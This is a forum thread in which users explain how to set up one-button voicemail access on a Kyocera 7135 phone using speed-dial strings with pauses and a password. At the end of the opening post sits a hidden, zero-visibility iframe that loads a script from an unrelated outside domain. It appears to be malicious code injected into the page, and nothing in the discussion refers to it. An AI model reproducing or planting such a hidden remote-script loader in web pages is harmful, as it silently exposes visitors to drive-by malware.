+ Reply to Thread
Results 1 to 7 of 7
  1. #1
    Registered User
    Join Date
    06-24-2002
    Posts
    56

    One Button/Speed Dial Voicemail

    Back in my 6035 days, if I held the "message" button in the dial pad of the phone, it accessed my voicemail by dialing the *86 number and entering my password in one step. Is there a way where I can do it on the 7135?

    Thanks in advance.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    04-10-2003
    Posts
    2
    I think the number 1 key performs this function -- press and hold.

    In fact, you can't use the number 1 key for speed dial, as you could with the 6035. I wish Kyocera had left it more flexible.

    Daryl

  3. #3
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Be sure to set your VM with password in the "Messages" app option "Voice Mail..."

    As I understand it, If you enter your number instead of *86 you can use Mobile 2 mobile minutes duirng instead of peak minutes and if you enter the area code you can use this while you are analog roaming as well.

    Example: 123-555-1212,,xxxxxx#1

    123 = area code
    555-1212 = your number
    ,, = pause for few seconds
    xxxxxx = Your password
    # = confirms password asap
    1=plays first VM asap


    Have fun
    iPhone therefore iAm.

  4. #4
    Registered User
    Join Date
    06-24-2002
    Posts
    56
    Thanks all for your quick replies. They worked great.

  5. #5
    Registered User
    Join Date
    02-22-2003
    Posts
    13
    I have entered the information as listed above in the "messages", "voicemail" area. Works fine for the #1 speed dial. However, when I have the screen up that notifies me I have a new voice mail, then hit the button on the screen to go retreave it, I still get the *86 instead of the information stored in the #1 speed dial. Any way to fix this?

    Dave

  6. #6
    jeh
    jeh is offline
    Registered User
    Join Date
    10-17-2002
    Posts
    258
    I had this question too. It turns out that if in the "Messages" app you set the "Voice mail" to *86,,#yourPassword (my access sequence seems to be a bit different from Steve's), this works from both the 1 speeddial and from the "Check" screen button in the "Messages" app.... even though the "voice mail details" screen still shows a "callback" of just "*86".

    But, if you set the "Voice mail" option to yourMobileNumber,,#yourPassword, that works only from the "1" speeddial button. The "Check" button in the Messages app reverts to just using *86. Same if you hit the dial button while in the Messages app.

    Workaround: From the "Message" app (or anyplace else for that matter) you can just hit the "hangup" button momentarily (which gets you to the phone screen), and then use the 1-onhook speeddial sequence. Three buttons instead of one.

    > I wish Kyocera had left it more flexible.

    Agreed. I hate it when they take flexibility away.

    Kyo> "But, we just assumed everyone would want a speeddial to their voice mail on the 1 key."

    Me> It is MY EFFING PHONE, damn you!!! Who are you to tell me what I "ought to want" on the 1 speeddial, or anywhere on the speeddial for that matter??? Grrrr!

  7. #7
    Registered User
    Join Date
    03-10-2003
    Posts
    176
    Is there an edit function when in the speed dial area? Is there anyway to change #s without starting from the beginning?? Dial, Add, Move and Clear but no edit.

    It's frustrating when you're trying to get passwords just right and need to go in and take a comma and need to rewrite the whole thing...


    Tracey

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts